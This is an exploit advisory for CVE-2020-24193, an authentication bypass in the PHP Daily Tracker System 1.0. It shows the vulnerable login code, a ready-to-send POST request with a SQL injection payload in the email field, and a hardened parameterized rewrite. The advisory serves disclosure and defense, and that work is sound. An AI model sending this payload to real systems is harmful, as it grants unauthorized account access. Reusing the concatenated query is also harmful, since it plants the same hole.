Daily Tracker System 1.0 - Authentication Bypass Vulnerability

# Exploit Author: Adeeb Shah (@hyd3sec) and Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

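if(isset($_POST['login']))
{
    // User-controlled value, used below without escaping or parameter binding
    $email=$_POST['email'];
    $password=md5($_POST['password']);
    // $email is concatenated straight into the SQL text, so its content can alter the WHERE clause
    $query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password    ' ");
    $ret=mysqli_fetch_array($query);
    // Any returned row is treated as a successful login
    if($ret>0){
        $_SESSION['detsuid']=$ret['ID'];
        header('location:dashboard.php');
    }
    else{
        $msg="Invalid Details.";
    }
}
?>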
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
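
Hardened form of the login handler above, as an added example (not from the original advisory or the vendor): the e-mail value is bound as a parameter instead of being concatenated into the query, and the hash comparison is done in PHP. It assumes $con is the application's existing mysqli connection and that tbluser.Password still holds unsalted MD5 hex digests, as in the vulnerable code; the authenticate() helper is a hypothetical name.

```php
<?php
// Added example. Assumptions: $con is the app's existing mysqli connection;
// tbluser.Password stores md5() hex digests, as in the vulnerable code.

// Hypothetical helper: returns the user ID on success, null otherwise.
function authenticate(mysqli $con, string $email, string $password): ?int
{
    // Reject anything that is not a syntactically valid address up front.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The placeholder keeps the e-mail value out of the SQL text entirely,
    // so quotes or comment markers in it are compared as data, not parsed.
    $stmt = $con->prepare('SELECT ID, Password FROM tbluser WHERE Email = ? LIMIT 1');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->bind_result($id, $storedHash);
    $found = $stmt->fetch();   // true when a row was fetched, null when none matched
    $stmt->close();

    if ($found !== true) {
        return null;
    }

    // Compare digests in constant time; a row alone no longer means "logged in".
    return hash_equals((string)$storedHash, md5($password)) ? (int)$id : null;
}

session_start();
$msg = '';
if (isset($_POST['login'])) {
    $uid = authenticate($con, (string)($_POST['email'] ?? ''), (string)($_POST['password'] ?? ''));
    if ($uid !== null) {
        session_regenerate_id(true);   // issue a fresh session ID after login
        $_SESSION['detsuid'] = $uid;
        header('Location: dashboard.php');
        exit;
    }
    $msg = 'Invalid Details.';
}
```

MD5 is kept here only so existing stored hashes keep working; moving to password_hash() and password_verify() is a separate migration.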
